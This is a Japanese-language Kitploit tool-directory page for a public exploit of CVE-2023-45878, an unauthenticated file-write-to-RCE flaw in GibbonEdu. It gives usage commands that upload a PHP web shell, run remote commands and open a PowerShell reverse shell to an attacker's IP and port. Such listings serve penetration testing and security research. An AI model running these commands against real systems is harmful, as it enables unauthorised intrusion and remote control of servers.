Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-45878 — GibbonEdu 任意ファイル書き込みからリモートコード実行 | Kitploit
ツール/GitHubGitHub/davidzzo23/cve-2023-45878
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubdavidzzo23/cve-2023-45878

CVE-2023-45878

GibbonEdu 任意ファイル書き込みからリモートコード実行

リポジトリを見る
321年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-45878

GibbonEdu 任意ファイル書き込みによるWebシェル実行

説明

このリポジトリには、CVE-2023-45878 のエクスプロイトが含まれています。これは GibbonEdu における任意ファイル書き込みの脆弱性です。この脆弱性は rubrics_visualise_saveAjax.php エンドポイントに影響し、認証されていない攻撃者が任意のファイルをWebサーバーにアップロードすることを可能にします。

このスクリプトは脆弱性を利用して PHP Webシェル をアップロードし、次のいずれかを実行します。

  • 特定のシステムコマンド を実行する。
  • Base64エンコードされたPowerShellリバースシェル をトリガーしてリモートアクセスを取得する。

使用方法

このスクリプトは2つの動作モードをサポートしています。

  • --command (-c): 特定のシステムコマンドをリモートで実行します。
  • --shell (-s): 攻撃者のリスナーに対してPowerShellリバースシェルをトリガーします。

エクスプロイトの実行方法

1. リポジトリをクローンする

root@kitploit:~
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878

2. Webシェルエクスプロイトを実行する

  • リモートコマンドを実行する:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
  • PowerShellリバースシェルをトリガーする:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>

免責事項

このスクリプトは教育目的のみを意図しています。許可なくシステムでこのエクスプロイトを不正に使用することは違法です。作者は、このエクスプロイトの誤用や損害について一切の責任を負いません。

ツールをダウンロード